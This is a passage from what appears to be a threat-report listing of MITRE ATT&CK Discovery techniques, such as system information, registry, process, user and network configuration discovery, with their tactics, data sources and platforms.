Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre